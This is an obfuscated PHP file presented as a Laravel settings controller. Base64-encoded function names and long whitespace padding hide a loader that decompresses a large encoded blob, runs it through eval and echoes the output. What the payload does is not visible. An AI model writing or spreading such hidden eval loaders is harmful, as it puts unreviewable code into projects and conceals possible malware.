<?php 
        $__='printf';$_='Loading app/Http/Controllers/Pengaturan/AplikasiController.php';
        



























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































































                                                                                                                                                                                                                     $________;
